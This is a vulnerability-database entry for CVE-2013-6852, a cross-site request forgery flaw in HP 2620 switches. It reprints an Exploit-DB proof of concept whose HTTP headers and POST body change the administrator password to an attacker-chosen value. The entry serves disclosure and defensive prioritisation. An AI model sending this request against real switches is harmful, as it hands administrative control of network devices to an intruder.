CVE-2013-6852
Description
Cross-site request forgery (CSRF) vulnerability in html/json.html on HP 2620 switches allows remote attackers to hijack the authentication of administrators for requests that change an administrative password via the setPassword method.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or β if you've already worked around this in production β publish your fix to the community-verified tier.
β Propose a mitigation on Community β Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Hewlett-Packard (HP) 2620 Switch Series. Edit Admin Account - Cross-Site Request Forgery
# Exploit Title: Hewlett-Packard 2620 Switch Series. Edit Admin Account - CSRF Vulnerability
# Date: 26.09.2013r.
# Exploit Author: Hubert GrΓβ¦dek (PL)
# Software Link: [download link if available]
# Tested on: HP-E2620 24-PoEP // RA.15.05.0006,ROMRA.15.10
HTTP Headers:
http://[IP_ADDR]/html/json.html
Host: [IP_ADDR]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://[IP_ADDR]/html/nhome.html
Cookie: sessionId=ANYTHING
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
POST Content:
method:setPassword&name=admin&password=newpassword&ext-comp-1171=newpassword&access=ManagerReferences
CWEs
CWE-352
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.